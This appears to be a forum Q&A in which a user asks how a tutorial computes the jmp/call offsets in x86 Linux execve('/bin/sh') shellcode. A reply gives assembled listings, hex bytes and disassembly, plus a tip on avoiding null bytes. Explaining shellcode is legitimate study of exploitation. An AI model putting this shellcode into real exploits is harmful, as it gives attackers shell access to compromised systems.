To create the shellcode, the author replaces the offset placeholders with their calculated values i.e. This
jmp offset-to-call # 2 bytes
popl %esi # 1 byte
movl %esi,array-offset(%esi) # 3 bytes
movb $0x0,nullbyteoffset(%esi)# 4 bytes
movl $0x0,null-offset(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal array-offset(%esi),%ecx # 3 bytes
leal null-offset(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call offset-to-popl # 5 bytes
/bin/sh string goes here.
gets translated into this
jmp 0x26 # 2 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2b # 5 bytes
.string \"/bin/sh\" # 8 bytes
However, I calculated offset-to-call to be 0x2a or 42 bytes (1+3+4+7+5+2+3+3+2+5+5+2) and offset-to-popl to be -0x2a.
How does the author get 0x26 and -0x2b?
0x2a
is correct as can be verified by assembling. For the call
it's obviously going to be 5 bytes more (as that is the length of the call
instruction), so -0x2f
is correct. Funnily enough neither of you got that right ;) Note that these are the offsets in the machine code, not something you can feed into the assembler. For that you should simply use a label:
1 0000 EB2A jmp label_call # 2 bytes
2 label_popl:
3 0002 5E popl %esi # 1 byte
4 0003 897608 movl %esi,0x8(%esi) # 3 bytes
5 0006 C6460700 movb $0x0,0x7(%esi) # 4 bytes
6 000a C7460C00 movl $0x0,0xc(%esi) # 7 bytes
6 000000
7 0011 B80B0000 movl $0xb,%eax # 5 bytes
7 00
8 0016 89F3 movl %esi,%ebx # 2 bytes
9 0018 8D4E08 leal 0x8(%esi),%ecx # 3 bytes
10 001b 8D560C leal 0xc(%esi),%edx # 3 bytes
11 001e CD80 int $0x80 # 2 bytes
12 0020 B8010000 movl $0x1, %eax # 5 bytes
12 00
13 0025 BB000000 movl $0x0, %ebx # 5 bytes
13 00
14 002a CD80 int $0x80 # 2 bytes
15 label_call:
16 002c E8D1FFFF call label_popl # 5 bytes
16 FF
17 0031 2F62696E .string "/bin/sh" # 8 bytes
17 2F736800
Or use a .
relative address, but that needs different offsets as .
refers to the current address and not the address of the next instruction as required by the machine code:
1 0000 EB2A jmp .+0x2c # 2 bytes
2 0002 5E popl %esi # 1 byte
3 0003 897608 movl %esi,0x8(%esi) # 3 bytes
4 0006 C6460700 movb $0x0,0x7(%esi) # 4 bytes
5 000a C7460C00 movl $0x0,0xc(%esi) # 7 bytes
5 000000
6 0011 B80B0000 movl $0xb,%eax # 5 bytes
6 00
7 0016 89F3 movl %esi,%ebx # 2 bytes
8 0018 8D4E08 leal 0x8(%esi),%ecx # 3 bytes
9 001b 8D560C leal 0xc(%esi),%edx # 3 bytes
10 001e CD80 int $0x80 # 2 bytes
11 0020 B8010000 movl $0x1, %eax # 5 bytes
11 00
12 0025 BB000000 movl $0x0, %ebx # 5 bytes
12 00
13 002a CD80 int $0x80 # 2 bytes
14 002c E8D1FFFF call .-0x2a # 5 bytes
14 FF
15 0031 2F62696E .string "/bin/sh" # 8 bytes
15 2F736800
The disassembly in both cases is:
0: eb 2a jmp 0x2c
2: 5e pop %esi
3: 89 76 08 mov %esi,0x8(%esi)
6: c6 46 07 00 movb $0x0,0x7(%esi)
a: c7 46 0c 00 00 00 00 movl $0x0,0xc(%esi)
11: b8 0b 00 00 00 mov $0xb,%eax
16: 89 f3 mov %esi,%ebx
18: 8d 4e 08 lea 0x8(%esi),%ecx
1b: 8d 56 0c lea 0xc(%esi),%edx
1e: cd 80 int $0x80
20: b8 01 00 00 00 mov $0x1,%eax
25: bb 00 00 00 00 mov $0x0,%ebx
2a: cd 80 int $0x80
2c: e8 d1 ff ff ff call 0x2
Confirming the correct target addresses.
PS: having zero bytes in shellcode is usually not a good idea.